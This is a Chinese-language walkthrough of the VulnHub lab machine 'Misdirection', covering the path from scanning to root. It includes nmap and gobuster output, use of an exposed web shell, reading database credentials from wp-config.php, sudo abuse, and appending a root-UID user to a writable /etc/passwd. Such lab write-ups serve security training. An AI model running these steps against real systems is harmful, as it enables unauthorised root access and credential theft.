这台靶机的名字叫“误导”,字如其名,无数信息看似敏感实则无用
端口
nmap主机发现
nmap -sn 192.168.227.0/24 Nmap scan report for 192.168.227.74 Host is up (0.00020s latency). 74是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.227.74 --min-rate 10000 -oA nmap/scan 扫描开放端口保存到 nmap/scan下 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http 发现开放4个端口
nmap -sT -sC -sV -O -p80 -oA nmap/scan 192.168.227.74详细端口扫描: -sT:完整tcp连接 -sC:默认脚本扫描 -sV:服务版本探测 -O:系统信息探测 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ecbb44eef333af9fa5ceb5776145e436 (RSA) | 256 677bcb4e951b78088d2ab147048d6287 (ECDSA) |_ 256 59041d25116d89a36c6de4e3d23cda7d (ED25519) 80/tcp open http Rocket httpd 1.2.6 (Python 2.7.15rc1) |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-server-header: Rocket 1.2.6 Python/2.7.15rc1 3306/tcp open mysql MySQL (unauthorized) 8080/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.29 (Ubuntu)
端口信息太多,直接漏洞脚本扫描 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.227.74 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.227.74:80/init/default/elections | Form id: auth_user_email__row |_ Form action: # | http-enum: | /admin/: Possible admin folder | /admin/admin/: Possible admin folder | /admin/backup/: Possible backup | /admin/download/backup.sql: Possible database backup |_ /examples/: Sample scripts |_http-dombased-xss: Couldn't find any DOM based XSS. | http-sql-injection: | Possible sqli for queries: | http://192.168.227.74:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider | http://192.168.227.74:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider | http://192.168.227.74:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider |_ http://192.168.227.74:80/init/default/user/login?_next=%2Finit%2Fdefault%2Felections%27%20OR%20sqlspider |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 3306/tcp open mysql 8080/tcp open http-proxy | http-enum: | /wordpress/: Blog | /wordpress/wp-login.php: Wordpress login page. | /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' | /debug/: Potentially interesting folder | /development/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' | /help/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' | /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' | /manual/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' |_ /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)' 值得注意的点: 80端口枚举出的目录和sql注入 3306端口说明部署了mysql服务 8080端口枚举出的目录,且是wordpress框架
立足点
网站信息收集
80端口是github上一个开源项目搭建的web服务 8080端口是wordpress服务(貌似访问不了blog,因为它的链接都是请求192.168.1.61这个地址,应该是靶机搭建时的固定ip)
目录扫描
扫描8080端口 gobuster dir -u http://192.168.227.74/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html --add-slash /.php/ (Status: 403) [Size: 296] /images/ (Status: 200) [Size: 745] /help/ (Status: 200) [Size: 741] /icons/ (Status: 403) [Size: 297] /.html/ (Status: 403) [Size: 297] /scripts/ (Status: 200) [Size: 747] /css/ (Status: 200) [Size: 739] /wordpress/ (Status: 500) [Size: 2696] /development/ (Status: 200) [Size: 755] /manual/ (Status: 200) [Size: 745] /js/ (Status: 200) [Size: 737] /shell/ (Status: 200) [Size: 743] /debug/ (Status: 200) [Size: 12908] /.html/ (Status: 403) [Size: 297] /.php/ (Status: 403) [Size: 296] /server-status/ (Status: 403) [Size: 305] 一个一个试,最后发现debug目录就是一个shell,啥信息都不用管了直接进去提权!!
提权(以下是试错过程,看正确提权直接跳过此步骤)
进去网站目录/var/www/html看一下,有没有配置内容
cd /var/www/html css development images js scripts wordpress debug help index.html manual shell 发现wordpress直接进去看看,看到wp-config.php,进去直接拿到mysql登录凭据 define( 'DB_NAME', 'wp_myblog' ); /** MySQL database username */ define( 'DB_USER', 'blog' ); /** MySQL database password */ define( 'DB_PASSWORD', 'abcdefghijklmnopqrstuv' );
先不着急利用,先再收集其他信息
cat /etc/crontab 看一下计划任务发现什么都没有 uname -a 看一下linux版本为4.15 sudo -l 看一下发现 User www-data may run the following commands on localhost: (brexit) NOPASSWD: /bin/bash cat /etc/passwd 看一下用户,确实有brexit这个用户,登录进去看看 brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
登录brexit
sudo -u brexit /bin/bash 在brexit用户文件夹/home/brexit发现了一个web2py的项目,google一下是个python的web框架,看看有没有配置信息。 在项目下看到web2py-scheduler.conf,看一下内容
web2py-scheduler.conf文件内容如下: description "web2py task scheduler" # INSTRUCTIONS: # COPY THIS FILE IN: # /etc/init/web2py-scheduler.con # # To start/stop the scheduler, use # "sudo start web2py-scheduler" # "sudo stop web2py-scheduler" # "sudo status web2py-scheduler" # # YOU MAY HAVE TO EDIT PATH TO WEB2PY BELOW start on (local-filesystems and net-device-up IFACE=eth0) stop on shutdown # Give up if restart occurs 8 times in 60 seconds. respawn limit 8 60 exec sudo -u www-data python /home/www-data/web2py/web2py.py -K parking > /tmp/scheduler.out respawn 解析:这个是web2py框架的任务调度器,可以通过 sudo start/stop/status web2py-scheduler 来启动、停止和查看服务状态。该文件需要放在 /etc/init/web2py-scheduler.conf,这是 Linux 系统中常见的 Upstart 配置文件路径,用于管理系统服务的启动与停止。 它是通过www-data执行web2py.py脚本所以不能通过修改web2py.py脚本获取root权限。这个就是个误导项 更关键的是,以我们现在的权限,www-data和brexit用户都不能将其复制到/etc/init下
没什么办法就登录我们的mysql看看
使用密码凭据登录 mysql -u blog -p abcdefghijklmnopqrstuv 数据库看了半天没有什么新发现,但是发现了wordpress博主admin的密码密文 admin : $P$BC4vcMsqXqr/cc46cx.E1arnrBq1yU/ 抓到密文后先看看有没有必要破解密文,如果他是误导项直接排除即可 首先我们看看 /etc/passwd里有没有admin这个用户,发现没有直接排除
然后再看一看内核漏洞能不能提权
searchsploit linux 4.15 看到了可能的利用如下图
gcc编译一下传到c语言文件,传到靶机运行,提示没有glibc库 ./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./pwn) ./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./pwn) 再试一试sh脚本能不能用,提示找不到gcc Command 'gcc' not found 下载gcc也下不了没有权限
提权成功
最后,我们看一看对敏感文件的权限,权限配置出现错误也有机会提权
最主要的是看一看/etc/passwd能不能改,如果能更改我们就可以新添加一个root组的用户 ls -la /etc/ | grep passwd -rwxrwxr-- 1 root brexit 1786 Sep 8 12:21 passwd -rw-r--r-- 1 root root 1602 Jun 1 2019 passwd- 发现passwd文件所属组是brexit,而brexit组的用户可对passwd文件有任意权限,这下好办了,直接新建一个用户覆盖即可
新建用户并覆盖passwd(用户:pwned ,密码:qwerty)
openssl passwd -1 -salt pwned qwerty 输出:$1$pwned$M5PdlTdbF2x4W25c3mADr1 直接:echo 'pwned:$1$pwned$M5PdlTdbF2x4W25c3mADr1:0:0::/root:/bin/bash' >> /etc/passwd 不过这种方式不怎么好,建议把源文件先备份下来 cp /etc/passwd /tmp/passwd echo 'pwned:$1$pwned$M5PdlTdbF2x4W25c3mADr1:0:0::/root:/bin/bash' >> /etc/passwd
切换用户
su pwned passwd:qwerty 直接进入root权限 brexit@misdirection:~/web2py$ su hack su pwned Password: qwerty root@misdirection:/home/brexit/web2py#
另外:这台机器还有另一种提权技巧,下一篇文章准备尝试那种提权技巧,是通过image进行提取,详细看https://benheater.com/vulnhub-misdirection-1/